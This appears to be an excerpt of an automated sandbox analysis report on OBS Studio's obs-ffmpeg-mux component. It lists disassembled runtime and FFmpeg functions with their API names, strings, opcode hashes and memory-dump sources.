                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: 91ef34f36c1f7546d25e11d7110aae56368f81ca4d9656bde594932d18e2aa9e
                                                            • Instruction ID: e37d7993a6e912e01cb50580ece1aaa5a8d447984f9bf7d2abb3da4442b61f6b
                                                            • Opcode Fuzzy Hash: 91ef34f36c1f7546d25e11d7110aae56368f81ca4d9656bde594932d18e2aa9e
                                                            • Instruction Fuzzy Hash: 5281D232F0F20295F76D4F35913027926A2AB10B44F55A0B1FA0A77387DFAFE805830A
                                                            Function 00007FFDA3832E28 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 214COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: f74006fff242e472b29e4078f17dfa188ac3fde7ef4abc39dd34ca6636835c7a
                                                            • Instruction ID: bcf2e8796ba8367c14f2a5809e6bd5ffede9b6deb3d29d530a519c6e3f7bf4c1
                                                            • Opcode Fuzzy Hash: f74006fff242e472b29e4078f17dfa188ac3fde7ef4abc39dd34ca6636835c7a
                                                            • Instruction Fuzzy Hash: 5281F131F0E21286FB7D4B38E27027C2A92AF15748F1550B1D96E76397CA6FA8419309
                                                            Function 00007FFDA381B4F8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: 6c71ad19f1e21a44dbcf63c70ddd50b8183cf0e6cc872e9bc7b2f8920246b6e0
                                                            • Instruction ID: 465dcaff7894fa06eca4594ada3ee0d93e400cf78257c68c61bade4ccd67ef9d
                                                            • Opcode Fuzzy Hash: 6c71ad19f1e21a44dbcf63c70ddd50b8183cf0e6cc872e9bc7b2f8920246b6e0
                                                            • Instruction Fuzzy Hash: C891D173B09B818AE711CB75E8902AC77A1FB44788F14416AEB8C27796DF3AD195CB04
                                                            Function 00007FFDA381B288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: 7eeedc7fa1acfeb619eb1d233461f354d54350560f15a7ab1f718499c444a672
                                                            • Instruction ID: 2ebc682c904439e97f1358ca6e088d00e24d33befe14464fb4789fcffd8dca5f
                                                            • Opcode Fuzzy Hash: 7eeedc7fa1acfeb619eb1d233461f354d54350560f15a7ab1f718499c444a672
                                                            • Instruction Fuzzy Hash: 0061C332A09BC582DB319F25E4503AAB7A1FB84794F044275EB9D13B96CF7ED190CB04
                                                            Function 00007FFDA381BA78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 3896166516-3733052814
                                                            • Opcode ID: 4714c09397db957e0b95a3ab11810a10cb1a4068a4c87fb034aee45988618846
                                                            • Instruction ID: 9e1626c34d77fae88fa8b6224a4b4ed23b689b2f8bdd5d1abf1277026223140e
                                                            • Opcode Fuzzy Hash: 4714c09397db957e0b95a3ab11810a10cb1a4068a4c87fb034aee45988618846
                                                            • Instruction Fuzzy Hash: DC51B132B0A3828BEB658F31D0642A977A2EB54B84F1441B5DA4D63BC6CF7FE450C709
                                                            Function 00007FFDA378EF30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: a3b5a55c53e367a828c0e4b41b290200ff18b0575709f1b1202722b130669e17
                                                            • Instruction ID: 94899b7c698b00a3e140552bc07b6404f8d95c54872221d58a8a6168195f4b22
                                                            • Opcode Fuzzy Hash: a3b5a55c53e367a828c0e4b41b290200ff18b0575709f1b1202722b130669e17
                                                            • Instruction Fuzzy Hash: 36613F22B0E6C186E6A0DB14F0603AEB7A2FB81341F500136E68D57B97DF2ED884CB45
                                                            Function 00007FFDA37A23BE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Affinity::operator!=Hardwareshared_ptr$EmptyFind_elemQueue::StructuredWorktype_info::_name_internal_method
                                                            • String ID: 0123456789ABCDEFabcdef-+Xx
                                                            • API String ID: 3988152214-2799312399
                                                            • Opcode ID: b3a3f6c7a8a4500005e8f90467c0d186e544c593074fa0cf1e63d2feea6031bd
                                                            • Instruction ID: da2dce02bdf00c36e531d24f7ad79f03d3e72bdaae31582ad3a55ef819fa2d2a
                                                            • Opcode Fuzzy Hash: b3a3f6c7a8a4500005e8f90467c0d186e544c593074fa0cf1e63d2feea6031bd
                                                            • Instruction Fuzzy Hash: 5F217132B0EAC584D6619B15E4601BFB7A2E7C5784F404832E6CD93BABCF2DD845CB04
                                                            Function 00007FF71E742990 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • avformat_new_stream.AVFORMAT-60(?,?,?,00007FF71E7412F1), ref: 00007FF71E7429AD
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF71E7412F1), ref: 00007FF71E7429C0
                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF71E7429D3
                                                              • Part of subcall function 00007FF71E742320: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00007FF71E7429D8,?,?,?,00007FF71E7412F1), ref: 00007FF71E742357
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __acrt_iob_func__stdio_common_vfprintfavformat_new_streamfprintf
                                                            • String ID: Couldn't create stream for encoder '%s'
                                                            • API String ID: 306180413-3485626053
                                                            • Opcode ID: 97d36ac62344db8522675eb32487dc47749b1acbad2880230df25e82e6eb689d
                                                            • Instruction ID: 061a4a44a8d58641f85c20437f192cb7effb392e698dfc884365dba581151681
                                                            • Opcode Fuzzy Hash: 97d36ac62344db8522675eb32487dc47749b1acbad2880230df25e82e6eb689d
                                                            • Instruction Fuzzy Hash: 8DF06D32B19B8082EA44DB16F451069A7A0FB8CFE0B88D035EE5D03B59DF3CE559CB00
                                                            Function 00007FFDA3796910 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacetstd::locale::_
                                                            • String ID:
                                                            • API String ID: 228209623-0
                                                            • Opcode ID: cf0caf64f65ac75084a90a768f0ab90963d8431ec8d5781725f49993c3f909eb
                                                            • Instruction ID: c8507b57e36124c1cab19cd453b6555e8cfda2cfd5f3adbf0ca43cf793449a7b
                                                            • Opcode Fuzzy Hash: cf0caf64f65ac75084a90a768f0ab90963d8431ec8d5781725f49993c3f909eb
                                                            • Instruction Fuzzy Hash: DF214F2271EA4181DA90DB15F49026AB7A5FBC47A0F501236FACE13BAADE3ED540CB04
                                                            Function 00007FFDA3797C00 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacetstd::locale::_
                                                            • String ID:
                                                            • API String ID: 228209623-0
                                                            • Opcode ID: e1649e7492c623a3dde3d0f52f4a7623223d295ee38f0812fc4da71757b835a0
                                                            • Instruction ID: 10f1a9dd965c6e5227d2eeea84eb337501d01b08a688632b2751f61a46c5cd16
                                                            • Opcode Fuzzy Hash: e1649e7492c623a3dde3d0f52f4a7623223d295ee38f0812fc4da71757b835a0
                                                            • Instruction Fuzzy Hash: DF212F3261EA8181DA50DB25F49016AB7A5FBD57A4F501232FB8E13BFADE3ED540CB04
                                                            Function 00007FFDA3798040 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacetstd::locale::_
                                                            • String ID:
                                                            • API String ID: 228209623-0
                                                            • Opcode ID: 32040dcdf6bf28da0db548812edf55dba035f115e56f80641840b219345a5ef9
                                                            • Instruction ID: 2b9477421222c443fb7a8c2e4d0312deea3103ec0634d6b979f4ba52745ef9e4
                                                            • Opcode Fuzzy Hash: 32040dcdf6bf28da0db548812edf55dba035f115e56f80641840b219345a5ef9
                                                            • Instruction Fuzzy Hash: 09212F3261EB4581DA90DB15F49016AB7A1FBC47A4F101231FA8E13BAADE3ED540CB04
                                                            Function 00007FFDA3797F30 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacetstd::locale::_
                                                            • String ID:
                                                            • API String ID: 228209623-0
                                                            • Opcode ID: 6258fb388a7ff5065e1413a87192748a7c717fb9ed2cbe81c0465edb7363f7b0
                                                            • Instruction ID: 8fd288d8bcc415e9288d512e7f924d07e554dab72a024a5bc59b15bd7799eb8a
                                                            • Opcode Fuzzy Hash: 6258fb388a7ff5065e1413a87192748a7c717fb9ed2cbe81c0465edb7363f7b0
                                                            • Instruction Fuzzy Hash: 5A21212261EF8581DA90DB15F49026AB7A2FBC47A4F501631F78E53BBADE3ED540CB04
                                                            Function 00007FFDA381BCB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 1467352782-3733052814
                                                            • Opcode ID: 3d5ad03003ffb9f93344a8bde9757900ad3769c4029a34a40f4fd4e2241e6ba1
                                                            • Instruction ID: c7160944ced0df3de61045dc841acf6b5bb438b0f33c4102790e83d13c8484f0
                                                            • Opcode Fuzzy Hash: 3d5ad03003ffb9f93344a8bde9757900ad3769c4029a34a40f4fd4e2241e6ba1
                                                            • Instruction Fuzzy Hash: 3971A132A0A68187DB668F75D4607797BA2EB04B84F148175EF4C67BC6CF2ED491CB04